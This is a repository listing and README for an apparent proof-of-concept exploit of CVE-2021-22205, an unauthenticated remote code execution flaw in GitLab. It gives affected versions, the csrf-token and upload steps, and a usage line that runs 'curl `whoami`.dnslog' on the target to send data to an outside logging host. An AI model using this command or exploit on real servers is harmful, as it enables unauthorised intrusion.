https://github.com/r0eXpeR/CVE-2021-22205

CVE-2021-22205 Unauthorized RCE
https://github.com/r0eXpeR/CVE-2021-22205

Last synced: 21 days ago
JSON representation

CVE-2021-22205 Unauthorized RCE

• Host: GitHub
• URL: https://github.com/r0eXpeR/CVE-2021-22205
• Owner: r0eXpeR
• Created: 2021-10-28T14:02:51.000Z (about 3 years ago)
• Default Branch: main
• Last Pushed: 2021-10-28T14:20:05.000Z (about 3 years ago)
• Last Synced: 2024-08-05T17:44:04.742Z (4 months ago)
• Language: Python
• Homepage:
• Size: 752 KB
• Stars: 70
• Watchers: 2
• Forks: 29
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - r0eXpeR/CVE-2021-22205 - CVE-2021-22205 Unauthorized RCE (Python)

README

        
# CVE-2021-22205

**影响版本：**

* Gitlab CE/EE < 13.10.3

* Gitlab CE/EE < 13.9.6

* Gitlab CE/EE < 13.8.8

**Usage**

```

python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

```

![Xnip2021-10-28_21-54-04](media/16354286989629/Xnip2021-10-28_21-54-04.png)

**获取csrf-token：**

![Xnip2021-10-28_21-44-31](media/16354286989629/Xnip2021-10-28_21-44-31.png)

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求，最终rce

![](media/16354286989629/16354299891310.jpg)

![Xnip2021-10-28_21-43-13](media/16354286989629/Xnip2021-10-28_21-43-13.png)

**ref:**

* https://hackerone.com/reports/1154542

* https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/

* https://forum.ywhack.com/viewthread.php?tid=115611

* https://forum.ywhack.com/viewthread.php?tid=116706

* https://github.com/RedTeamWing/CVE-2021-22205